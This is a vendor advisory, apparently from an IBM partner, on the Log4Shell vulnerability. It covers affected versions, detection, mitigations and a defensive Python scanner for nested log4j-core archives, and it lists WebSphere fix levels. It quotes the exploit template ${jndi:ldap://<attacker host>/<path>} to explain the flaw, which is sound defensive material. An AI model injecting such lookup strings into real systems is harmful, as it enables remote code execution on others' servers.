IBM Products and the Log4j security vulnerability

On December 9, 2021, a critical vulnerability in the Log4j logging library was publicly disclosed. Log4j is a widely used open-source library for generating log messages from Java applications. The vulnerability, CVE-2021-44228, also known as Log4Shell, permits Remote Code Execution (RCE): when message lookup substitution is enabled, a string of the form ${jndi:ldap://<attacker host>/<path>} placed in any value the application logs (an HTTP User-Agent header, a username, a form field) causes Log4j to perform a JNDI lookup, fetch a class from the attacker-controlled LDAP (or RMI) server and execute it. Because the attacker only needs to get that string into something the application logs, the flaw is exploitable remotely without authentication.


The Log4j library is used in some of the applications written by Genus as well as in many of the products Genus specializes in. Almost all Log4j 2 releases are affected: CVE-2021-44228 itself affects 2.0-beta9 through 2.14.1, and the follow-on issues found while the fixes were reviewed (CVE-2021-45046 in 2.15.0, CVE-2021-45105 in 2.16.0 and CVE-2021-44832 in 2.17.0) mean that anything below 2.17.1 (or below the Java 7 backport 2.12.4 and the Java 6 backport 2.3.2) still carries at least one open issue from this family. Log4j 1.x is not vulnerable to CVE-2021-44228, but it has been end of life since 2015 and has its own vulnerabilities (for example CVE-2021-4104 in JMSAppender, reachable only where that appender is configured), so it should not be treated as a safe alternative.


Apache released a series of Log4j patches between December 2021 and February 2022 that addressed these vulnerabilities: 2.15.0, 2.16.0, 2.17.0 and 2.17.1 during December 2021, and 2.17.2 in February 2022.

A quick way to assess whether you are impacted by this CVE is to search the file systems of your servers for “log4j-core-2.*.jar”. Treat a clean result as a starting point rather than a conclusion, because the filename search misses two common cases: log4j-core is frequently packaged inside WAR, EAR and fat JAR archives, where its name is not visible on disk, and some vendors repackage (shade) the classes under a different jar name. For those cases, inspect archive contents for the class org/apache/logging/log4j/core/lookup/JndiLookup.class, or for META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties, which records the exact version.

If you’re impacted by this CVE, remediation options include:

  1. Preferably, upgrade to a patched version of the software that includes Log4j 2.17.2 or higher (2.17.1 is the first release with no open issue from this family; 2.17.2 is the current one).
  2. Replace log4j-core-2.x.jar with log4j-core-2.17.2.jar. Replace log4j-api-2.x.jar with the matching 2.17.2 version at the same time, since log4j-core requires a log4j-api of the same release. You may also need to update references to the jar names in META-INF/MANIFEST.MF (Class-Path entries) and in startup scripts or other files that name the jar explicitly.
  3. If the application is using Log4j 2.10 through 2.14.1, add the JVM argument

             -Dlog4j.formatMsgNoLookups=true

     (or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true) to disable Log4j message lookup substitution. Apache has since withdrawn this as a complete mitigation: it does not cover CVE-2021-45046, in which lookups reachable through a non-default Pattern Layout (for example Thread Context Map values referenced with ${ctx:...}) are still evaluated. Treat it as a short-term stopgap only.

  4. Remove the JndiLookup class from the jar file manually:

               zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

     This is Apache's recommended mitigation when upgrading is not possible; it closes the JNDI issues (CVE-2021-44228 and CVE-2021-45046) on every 2.x release from 2.0-beta9 onward, though not the unrelated recursion DoS CVE-2021-45105. Run it against one jar at a time (if the glob expands to more than one file, zip treats the extra names as entries to delete), repeat for copies bundled inside WAR and EAR archives, and restart the JVM afterwards since running processes already have the class loaded. Confirm the result by listing the jar's entries with unzip -l: the JndiLookup entry should no longer appear.
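The filename search above and the JndiLookup removal in step 4 both leave a verification gap: a name search misses log4j-core bundled inside WAR/EAR/fat JAR archives or shaded under another name, and a removed class needs confirming per copy. The following Python script is an added example written for this page, not Genus or IBM tooling. It walks a directory tree, opens every jar/war/ear, recurses into archives nested inside other archives, reads the version from log4j-core's Maven pom.properties, lists which CVEs of the Log4Shell family that version is still open to using Apache's published fix levels, and reports whether JndiLookup.class is still present. The sample archives it builds are constructed stand-ins holding only the entries the check reads; FIX_LEVELS, the finding dictionary layout and the helper names are this example's own.

```python
"""Offline scan for log4j-core JARs (nested ones included): version, open CVEs, JndiLookup present?"""
import io
import os
import sys
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# First fixed release per CVE on the Java 8 / Java 7 (2.12.x) / Java 6 (2.3.x) lines (Apache Log4j security page)
FIX_LEVELS = [
    ("CVE-2021-44228", ("2.15.0", "2.12.2", "2.3.1")),
    ("CVE-2021-45046", ("2.16.0", "2.12.2", "2.3.1")),
    ("CVE-2021-45105", ("2.17.0", "2.12.3", "2.3.1")),
    ("CVE-2021-44832", ("2.17.1", "2.12.4", "2.3.2")),
]

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 2, 0); pre-releases sort below the final release,
    e.g. '2.0-beta9' -> (2, 0, 0, 0, 9) and '2.0-rc1' -> (2, 0, 0, 1, 1)."""
    core, _, pre = text.partition("-")
    nums = [int(p) for p in core.split(".")]
    nums += [0] * (3 - len(nums))
    if not pre:
        return (*nums, 2, 0)
    tag = 0 if pre.lower().startswith("beta") else 1
    return (*nums, tag, int("".join(ch for ch in pre if ch.isdigit()) or "0"))

def open_cves(version):
    """CVEs of the Log4Shell family that this log4j-core version is still exposed to."""
    v = parse_version(version)
    if v < parse_version("2.0-beta9"):
        return []  # JNDI lookup arrived in 2.0-beta9; earlier betas are out of scope here
    branch = 1 if version.startswith("2.12.") else 2 if version.startswith("2.3.") else 0
    return [cve for cve, fixes in FIX_LEVELS if v < parse_version(fixes[branch])]

def inspect_archive(data, path):
    """Yield one finding per log4j-core found in `data`, recursing into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = "unknown"  # shaded/repackaged jars may carry no pom.properties
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            yield {"path": path, "version": version,
                   "open_cves": open_cves(version) if version != "unknown" else ["unknown"],
                   "jndi_lookup_present": JNDI_CLASS in names}
        for name in sorted(names):  # a jar inside a war inside an ear is still reached
            if name.lower().endswith(ARCHIVE_EXT):
                yield from inspect_archive(zf.read(name), f"{path}!/{name}")

def scan_tree(root):
    """Walk `root`, inspect every archive (nested ones included), return findings sorted by path."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    rel = os.path.relpath(full, root).replace(os.sep, "/")
                    findings.extend(inspect_archive(fh.read(), rel))
    return sorted(findings, key=lambda f: f["path"])

def make_log4j_core_jar(version, with_jndi_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar with only the entries the check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()

def build_sample_tree(root=None):
    """Constructed sample layout: an EAR bundling a vulnerable 2.14.1, a 2.15.0 with JndiLookup
    removed, a patched 2.17.2, and a log4j-api jar that must not be flagged."""
    root = root or tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    ear = io.BytesIO()
    with zipfile.ZipFile(ear, "w") as zf:
        zf.writestr("lib/log4j-core-2.14.1.jar", make_log4j_core_jar("2.14.1"))
    with zipfile.ZipFile(os.path.join(root, "lib", "log4j-api-2.17.2.jar"), "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    for rel, data in {"app.ear": ear.getvalue(),
                      "lib/log4j-core-2.15.0.jar": make_log4j_core_jar("2.15.0", False),
                      "lib/log4j-core-2.17.2.jar": make_log4j_core_jar("2.17.2")}.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()):
        print(f"{f['path']}: log4j-core {f['version']}; open: {', '.join(f['open_cves']) or 'none'}; JndiLookup present: {f['jndi_lookup_present']}")
```

Run it with a directory argument to scan a real installation (for example the WebSphere profile and installedApps directories); without an argument it scans the constructed sample tree and reports the 2.14.1 copy hidden inside app.ear with all four CVEs open, the 2.15.0 copy with JndiLookup already removed, and the 2.17.2 copy as clean. A finding with version "unknown" and JndiLookup present means a shaded or repackaged copy that still needs the class removed or the vendor's fix applied.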

 

Below is a list of IBM products, their vulnerability status, suggested remediation, and links to find more information.

Product: WebSphere Application Server 8.5.0.0 through 8.5.5.20
Vulnerability Status: Vulnerable
Preferred Remediation:
  - Upgrade to fix pack 8.5.5.21 when available
  - Upgrade to 8.5.5.20 and apply Interim Fix PH42728
See Also: https://www.ibm.com/support/pages/node/6525706

Product: WebSphere Application Server 9.0.0.0 through 9.0.5.10
Vulnerability Status: Vulnerable
Preferred Remediation:
  - Upgrade to fix pack 9.0.5.11 when available
  - Upgrade to 9.0.5.10 and apply Interim Fix PH42728
See Also: https://www.ibm.com/support/pages/node/6525706